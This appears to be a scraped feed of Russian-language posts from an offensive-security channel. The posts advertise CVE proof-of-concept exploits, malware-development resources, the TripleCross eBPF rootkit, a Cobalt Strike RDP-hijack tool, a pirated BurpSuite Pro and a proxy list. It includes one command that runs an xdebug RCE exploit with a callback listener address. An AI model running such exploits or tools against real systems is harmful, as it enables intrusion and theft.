Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
Полный разбор что\как\зачем\по_чём

#vuln

Подгружаем наши библиотеки из памяти в хост-процесс !
Ыть

#linux #backdoor

Ракинролл
Объявляем "конкурс говнарьской песни"
Присылайте свои хиты на proxy-bar@proton.me
Тема песен:
1. Наколи мне Docker
2. Я с blackHat'ом не дружу, я в bugBounty хочу
3. Четыре деповса в лодке и джун

Фото выкрано путем тяжелой отаки на твитор

Сначала было смешно, а потом как не смешно !
Есть на гитхабе некий RanSim (линк мы вам конечно же не дадим).
****
Это шляпа на PowerShell, которая моделирует (ога ога) поведение шифровальщика !
А моделирует оно путем рекурсивного шифрования (aes 256) всего чего увидит.
****
Этот же скрипт можно использовать для ДЕшифровки, ЕСЛИ ЭТО НЕОБХОДИМО - говорят нам разработчики))))
Подмена понятий в действии.
#ransomware

Увидеть малварь в Париже и умереть
Malware Dev for Dummies

#malware

Hacking in Practice Intensive Ethical Hacking MEGA Course
4.8 Gb
download

Payloads - это как сыр в пицце ! нужно много и разных
Даунлоаде

#redteam #payload

CVE-2022-24342
JetBrains TeamCity - account takeover via CSRF in GitHub authentication (PoC exploit)
Смотреть немое кино тут

#cve #poc

Про шифрование на mega.nz наверно все уже слышали да ?
Уже и mitm RSA key recovery POC гуляет
Вот на почитать - как оно устроенно:
1. Malleable Encryption Goes Awry
2. RSA Key Recovery Attack
3. MEGA attack explainer
Вот на посмотреть
1. RSA key attack

#mega #rsa #poc

Рубрика: "Нам прислали"
======================
An automated exploit to the xdebug 2.5.5 RCE vulnerability

python3 xdebug.py -u http://10.10.10.83/index.php -l 10.10.16.3

CVE-2022-26135
jira-mobile-ssrf-exploit
Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server
exploit

#jira #exploits

WSO_2_RCE
CVE-2022-29464
POC exploit

#exploit #poc

awesome-malware-development

В составе:
00 - Блоги
01 - Talks
02 - Youtube channels
03 - Courses
04 - Books
05 - Articles/posts
06 - Forums
07 - Sample Sharing
08 - interesting Github Repos(miscellaneous)

#malware #dev

BurpSuite plugin RouteVulScan

Django vuln

CVE-2022-34265
Используя эту уязвимость, атакующий может отправить в базу данных команды для доступа к данным или удаления базы данных.
=======
Уязвимые версии
Django 3.2.x prior to 3.2.14
Django 4.0.x prior to 4.0.6
=======
POC

#exploit #django

BurpSuite PRO 2022.7
#burp

eBPF и наступательные технологии в виде Руткита TripleCross
😎
CONTENT

* Features
* TripleCross overview
* Build and install
* Library injection module
* Backdoor and C2
* Execution hijacking module
* Rootkit persistence
* Rootkit stealth
* License

TripleCross rootkit

#linux #rootkit

Cobalt Strike Beacon
RDP_Hijack
Имея golden Ticket можно перехватывать RDP сессии не подгружая сам beacon на целевой хост.
download

#cobalt

socks5 proxy.
977 rows.
updated 16.07.2022 , 08:00
#proxy